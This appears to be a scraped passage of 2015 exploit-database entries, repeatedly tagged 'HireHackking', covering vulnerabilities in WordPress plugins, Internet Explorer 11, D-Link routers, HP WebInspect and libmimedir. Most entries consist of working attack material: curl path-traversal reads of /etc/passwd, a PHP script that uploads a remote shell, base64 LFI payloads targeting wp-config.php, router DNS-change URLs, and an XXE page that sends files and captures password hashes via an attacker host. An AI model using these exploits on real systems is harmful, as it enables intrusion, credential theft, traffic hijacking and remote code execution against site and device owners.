21         header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
22         header('Last-Modified: '.gmdate ('D, d M Y H:i:s', filemtime ($file_name)).' GMT');
23         header('Cache-Control: private',false);
24         header('Content-Type: '.$mime);
25         header('Content-Disposition: attachment; filename="'.basename($file_name).'"');
26         header('Content-Transfer-Encoding: binary');        
27         header('Content-Length: '.filesize($file_name));        // provide file size
28         header('Connection: close');
29         readfile($file_name);           // push it out
30         exit();

The above code does not verify if a user is logged in, and do proper sanity checking if the file is outside of the uploads directory.

CVEID: 2015-4414
OSVDB:
Exploit Code:
  • $ curl http://server/wp-content/plugins/se-html5-album-audio-player/download_audio.php?file=/wp-content/uploads/../../../../../etc/passwd
HireHackking 
Title: Remote file upload vulnerability in aviary-image-editor-add-on-for-gravity-forms v3.0beta Wordpress plugin
Author: Larry W. Cashdollar, @_larry0
Date: 2015-06-07
Download Site: https://wordpress.org/plugins/aviary-image-editor-add-on-for-gravity-forms
Vendor: Waters Edge Web Design and NetherWorks LLC
Vendor Notified: 2015-06-08
Advisory: http://www.vapid.dhs.org/advisory.php?v=125
Vendor Contact: plugins@wordpress.org
Description: A plugin that integrates the awesome Adobe Creative SDK (formerly Aviary) Photo / Image Editor with the Gravity Forms Plugin.
Vulnerability:
There is a remote file upload vulnerability in aviary-image-editor-add-on-for-gravity-forms/includes/upload.php as an unauthenticated user can upload any file to the system.  Including a .php file.  The upload.php doesn't check that the user is authenticated and a simple post will allow arbitrary code to be uploaded to the server.

In the file aviary-image-editor-add-on-for-gravity-forms/includes/upload.php the code doesn’t check for an authenticated Wordpress user:

1 <?php
2 
3 $filename = $_SERVER["DOCUMENT_ROOT"]."/wp-load.php";
4 if (file_exists($filename)) {
5     include_once($filename);
6 } else {
7     include_once("../../../../wp-load.php");
8 }
9 echo "Here";
10 $image_file = $_FILES['gf_aviary_file'];
11 if($image_file['name']!=''){
12      $max_file_size =  4*1024*1024;
13      $file_size = intval($image_file['size']);
14      if( $file_size > $max_file_size ){
15          $msg = "File Size is too big.";
16          $error_flag = true;
17      }
18      $extension = strtolower(end(explode('.', $image_file['name'])));
19      $aa_options = get_option('gf_aa_options');
20      $supported_files = $aa_options['supported_file_format'];
21      $supported_files = strtolower($supported_files);
22      if(!$error_flag && $supported_files != '' ){
23        $supported_files = explode (',', $supported_files);
24        if(!in_array($extension, $supported_files)){
25           $msg = "No Supported file.";
26           $error_flag = true;
27        }
28      }
29      if(!$error_flag){
30         $wp_upload_dir = wp_upload_dir();
31         if(!is_dir($wp_upload_dir['basedir'].'/gform_aviary')){
32              mkdir($wp_upload_dir['basedir'].'/gform_aviary');
33         }
34         $upload_dir = $wp_upload_dir['basedir'].'/gform_aviary/';
35         $upload_url = $wp_upload_dir['baseurl'].'/gform_aviary/';
36         $file_name = $upload_dir.$_POST['gf_aviary_field_id'].'_'.$image_file['name'    ];
37         if(move_uploaded_file($image_file['tmp_name'], $file_name)){
38             $file_url = $upload_url.$_POST['gf_aviary_field_id'].'_'.$image_file['na    me'];
39         }
40     }
41     $return_obj = array('status' => 'success', 'message' => $file_url);
42     echo json_encode($return_obj);
43  }
44 ?>

CVEID: 2015-4455
OSVDB:
Exploit Code:
<?php
/*Remote shell upload exploit for aviary-image-editor-add-on-for-gravity-forms v3.0beta */
/*Larry W. Cashdollar @_larry0
6/7/2015
shell will be located http://www.vapidlabs.com/wp-content/uploads/gform_aviary/_shell.php
*/


    $target_url = 'http://server/wp-content/plugins/aviary-image-editor-add-on-for-gravity-forms/includes/upload.php';
    $file_name_with_full_path = '/var/www/shell.php';

    echo "POST to $target_url $file_name_with_full_path";
    $post = array('name' => 'shell.php','gf_aviary_file'=>'@'.$file_name_with_full_path);

    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL,$target_url);
    curl_setopt($ch, CURLOPT_POST,1);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
    $result=curl_exec ($ch);
    curl_close ($ch);
    echo "<hr>";
    echo $result;
    echo "<hr>";
?>
HireHackking 
<!--
# Exploit title: Microsoft Internet Explorer 11 Crash PoC
# Date: 07.06.2015
# Vulnerable version: 11 (newest at the time 11.0.9600.17801)
# Tested on: Windows 7/8.1
# Author: Pawel Wylecial
# http://howl.overflow.pl @h0wlu
-->
<html>
<head>
<meta http-equiv="Cache-Control" content="no-cache"/>
<script>
function boom() {
        var divA = document.createElement("div");
        document.body.appendChild(divA);

        try {
                //divA.contentEditable = "true";
                divA.outerHTML = "AAAA";
                var context = divA['msGetInputContext']();
        }
        catch (exception) {
        }
}
</script>
</head>
<body onload='boom();'>
</body>
</html>
<!--
(2534.480c): Access violation - code c0000005 (!!! second chance !!!)
eax=00000000 ebx=0fa48f84 ecx=00000000 edx=0a433fb8 esi=00000000 edi=0fa48e98
eip=5f302e86 esp=0c9db5a4 ebp=0c9db5c8 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
MSHTML!Tree::ElementNode::GetCElement:
5f302e86 f7410800001000  test    dword ptr [ecx+8],100000h ds:002b:00000008=????????
-->
HireHackking 
  D-Link DSL-2730B AU_2.01 
  Authentication Bypass DNS Change

  Copyright 2015 (c) Todor Donev 
  <todor.donev at gmail.com>
  http://www.ethical-hacker.org/
  https://www.facebook.com/ethicalhackerorg

  Disclaimer:
  This or previous programs is for Educational
  purpose ONLY. Do not use it without permission.
  The usual disclaimer applies, especially the
  fact that Todor Donev is not liable for any
  damages caused by direct or indirect use of the
  information or functionality provided by these
  programs. The author or any Internet provider
  bears NO responsibility for content or misuse
  of these programs or any derivatives thereof.
  By using these programs you accept the fact
  that any damage (dataloss, system crash,
  system compromise, etc.) caused by the use
  of these programs is not Todor Donev's
  responsibility.
  
  Use them at your own risk!

  This security hole allows an attacker to bypass 
  authentication and change the DNS. When the
  administrator is logged in the web  management 
  interface, an attacker may be able to completely 
  bypass authentication phase and connect to the 
  web management interface with administrator's 
  credentials. This attack can also be performed 
  by an external attacker who connects to the 
  router's public IP address, if remote management 
  is enabled. To change the DNS without logging 
  into web management interface use the following URL:
  
http://TARGET/dnscfg.cgi?dnsPrimary=8.8.8.8&dnsSecondary=8.8.4.4&dnsDynamic=0&dnsRefresh=1&dnsIfcsList=
HireHackking 
  D-Link DSL-526B ADSL2+ AU_2.01 
  Unauthenticated Remote DNS Change

  Copyright 2015 (c) Todor Donev 
  <todor.donev at gmail.com>
  http://www.ethical-hacker.org/
  https://www.facebook.com/ethicalhackerorg

  No description for morons, 
  script kiddies & noobs !!

  Disclaimer:
  This or previous programs is for Educational
  purpose ONLY. Do not use it without permission.
  The usual disclaimer applies, especially the
  fact that Todor Donev is not liable for any
  damages caused by direct or indirect use of the
  information or functionality provided by these
  programs. The author or any Internet provider
  bears NO responsibility for content or misuse
  of these programs or any derivatives thereof.
  By using these programs you accept the fact
  that any damage (dataloss, system crash,
  system compromise, etc.) caused by the use
  of these programs is not Todor Donev's
  responsibility.
  
  Use them at your own risk!

[todor@adamantium ~]$ GET "http://TARGET/dnscfg.cgi?dnsSecondary=8.8.8.8&dnsDynamic=0&dnsRefresh=1" | grep "var dns2"  
    var dns2 = '8.8.8.8';
HireHackking 
# Exploit Title: Wordpress Plugin RobotCPA V5 - Local File Include
# Google Dork: inurl:"/wp-content/plugins/robotcpa/"
# Date: 09.06.2015
# Exploit Author: T3N38R15
# Vendor Homepage: http://robot-cpa.good-info.co/
# Version: 5V
# Tested on: Windows (Firefox)
                   Linux      (Firefox)
The affected file is f.php and the get-parameter "l" is vulnerable to local file inclusion.
We just need to base64 encode our injection.
Like that : 
php://filter/resource=./../../../wp-config.php
cGhwOi8vZmlsdGVyL3Jlc291cmNlPS4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==
or
file:///etc/passwd
ZmlsZTovLy9ldGMvcGFzc3dk

our injection look then like that :
http://domain.com/wp-content/plugins/robotcpa/f.php?l=ZmlsZTovLy9ldGMvcGFzc3dk
and we can see the content of the passwd file.

greets to Black Sniper
Regards T3N38R15
HireHackking 
# Exploit Title: HP WebInspect - XML External Entity
# Date: 23\04\2015
# Exploit Author: Jakub Palaczynski
# Vendor Homepage: http://www.hp.com/
# Version: 10.4, 10.3, 10.2, 10.1, 10.0, 9.x, 8.x, 7.x
# CVE : CVE-2015-2125

1. Create website that exploits vulnerability.

1.1. Website that steals files using OOB technique:
1.1.1. Website that triggers vulnerability:
<html>
<body>

<form action="/" method="POST">
<input type="hidden" name="payload" value='<?xml+version="1.0"+encoding="utf-8"?><!DOCTYPE+m+[+<!ENTITY+%25+remote+SYSTEM+"http://attacker/file.xml">%25remote;%25int;%25trick;]><tag></tag>'/>
<input type="submit" value="Submit" />
</form>

</body>
</html>
1.1.2. file.xml file that is served on attacker's host. This file specifies which file should be retrieved from remote host and where content of that file should be sent:
<!ENTITY % payl SYSTEM "file:///C:/Windows/system.ini">

<!ENTITY % int "<!ENTITY &#37; trick SYSTEM 'http://attacker/?p=%payl;'>">

1.2. Website that steals hashes of Administrator user:
1.2.1. Website that triggers vulnerability:
<html>
<body>

<form action="/" method="POST">
<input type="hidden" name="payload" value='<?xml+version="1.0"+encoding="utf-8"?><!DOCTYPE+m+[+<!ENTITY+%25+remote+SYSTEM+"\\attacker\path\file.txt">%25remote;]><tag></tag>'/>
<input type="submit" value="Submit" />
</form>

</body>
</html>
1.2.2. Attacker needs to start tool on the server that captures hashes.

2. Exploit is triggered while profiling or scanning created application using vulnerable versions of HP WebInspect.
HireHackking 
#!/usr/bin/python
# libmimedir-free.py
#
# Libmimedir VCF Memory Corruption PoC (CVE-2015-3205)
#
# Jeremy Brown [jbrown3264/gmail]
# June 2015
#
# -Synopsis-
#
# Adding two NULL bytes to the end of a VCF file allows a user to manipulate free() calls
# which occur during it's lexer's memory clean-up procedure. This could lead to exploitable
# conditions such as crafting a specific memory chunk to allow for arbitrary code execution.
#
# -Tested-
#
# libmimedir-0.5.1.tar.gz
# libmimedir-static 0.4-13.fc21
#
# -Notes-
#
# Reported to Red Hat Bugzilla in May (1222251) and remains unfixed as of now. There's already
# a stale bug (1049214) to upgrade to latest upstream and there wasn't a movement to work on a
# fix with this one. yy_get_next_buffer() in dirlex.c would likely take the patch.
#

from struct import pack

def main():
    mime = "begin:vcard<x\nx;type=x;type=x,"
    mime += pack("<Q", 0x4141414141414141) # mdm->p
    mime += pack("<Q", 0x4242424242424242) # mdm->next
    mime += ":x>x.l:x"
    mime += pack("<H", 0x0000) # 2 x YY_END_OF_BUFFER_CHAR
    
    print("Writing free.vcf to local directory...")
    
    try:
        with open("free.vcf", 'wb') as outfile:
            outfile.write(mime)

    except Exception as error:
        print("Error: %s\n" % error);
        return
    
    print("Done\n")
    
    return

if __name__ == "__main__":
    main()
HireHackking 
# Exploit Title: Paypal Currency Converter Basic For Woocommerce File Read
# Google Dork: inurl:"paypal-currency-converter-basic-for-woocommerce"
# Date: 10/06/2015
# Exploit Author: Kuroi'SH
# Software Link:
https://wordpress.org/plugins/paypal-currency-converter-basic-for-woocommerce/
# Version: <=1.3
# Tested on: Linux
 Description:
 proxy.php's code:
 <?php
$file = file_get_contents($_GET['requrl']);
$left=strpos($file,'<div id=currency_converter_result>');
$right=strlen($file)-strpos($file,'<input type=hidden name=meta');
$snip= substr($file,$left,$right);
echo $snip;
?>
Based on user input, the content of a file is printed out (unfortunately
not included) so any html file can be loaded, and an attacker may be able
to read  any local file which
is not executed in the server.
Example:
http://localhost/wp-content/plugins/paypal-currency-converter-basic-for-woocommerce/proxy.php?requrl=/etc/passwd
POC:
curl --silent --url
http://localhost/wp-content/plugins/paypal-currency-converter-basic-for-woocommerce/proxy.php?requrl=/etc/passwd